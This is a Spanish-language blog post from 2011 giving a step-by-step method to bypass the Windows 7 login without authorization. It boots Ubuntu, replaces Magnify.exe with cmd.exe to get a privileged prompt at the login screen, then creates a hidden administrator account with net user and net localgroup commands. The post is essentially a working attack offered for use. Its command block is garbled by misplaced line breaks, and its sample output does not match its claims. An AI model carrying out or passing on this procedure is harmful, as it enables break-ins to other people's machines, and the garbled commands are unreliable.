Sign by zerokey

miércoles, 30 de marzo de 2011

bypassear login de W7.

19:41  VLAD  No comments

Esta vez se explicara el método de bypass, para Windows con Ubuntu, cabe destacar que no es nuevo, pero es muy sencillo.
Normalmente, para entrar en una máquina Windows sin tener autorización para ello, era necesario saber las contraseñas, ya sean del usuario o de administrador, esto se hacía “a mano” o con distribuciones de Linux especificas y con la ayuda de alguna tabla Rainbow. Otra forma era utilizar Kon-Boot para parchear el proceso de autenticación en memoria.
Todos sabemos que Windows está especialmente concienciado con las opcines de accesibilidad, teniendo en cuenta por ejemplo, a la personas con dificultades para leer bien, por lo que incluso al hacer el login ya te da la opción de usar las utilidades para ayudar a estas personas.


Por lógica, esto es un programa que te busca el cursor y todo lo que tenga alrededor lo hace mas grande. Sin embargo, pensando cómo es Windows o en general cualquier sistema operativo, todo programa estará asociado a una cuenta que sea la que lo haya ejecutado. Pero...¿Qué cuenta lo ejecuta si ni hemos puesto la contraseña de la nuestra? Por lógica debería de ser uno con privilegios mínimos. 






Vamos a probar....
 Descargamos alguna distribución Linux en pendrive como Ubuntu.
2º Arrancamos desde ese usb y montamos la partición de windows.
 Nos vamos a la ruta C:\Windows\System32
 Nos hacemos una copia de seguridad del fichero Magnify.exe.








5º Borramos o renombramos el fichero Magnify.exe.
6º Copiamos el fichero cmd.exe y lo cambiamos de nombre a Magnify.exe






7º Reiniciamos el ordenador y dejamos que arranque Windows.








 Volvemos a ejecutar la herramienta de lupa.















Nos acaba de salir una bonita ventana de comandos. Lo curioso es el path del principio, que parece de administrador. 





Comprobamos quiénes somos con: whoami

Microsoft Windows [Versión 6.1.7600] 
Copyright (c) 2009 Microsoft Corporation. 
Reservados todos los derechos.
C:\Users\Admin>whoami 


Admin-pc\admin  


C:\Users\Admin>




Ahora vamos a crearnos un usuario administrador vía linea de comandos:

net user 
/add test2 net localgroup administrators test2 
/add net user test2 *




Una cosa negativa de este método es que hasta que no inicies sesión, no puedes acceder a panel de control y a Mi PC. Si inicias el iexplorer algunas veces va bien y otras mal. Si aun así lo queréis probar, ejecutad en la consola de comandos el proceso explorer.exe.

















Posted in:

0 comentarios:

Publicar un comentario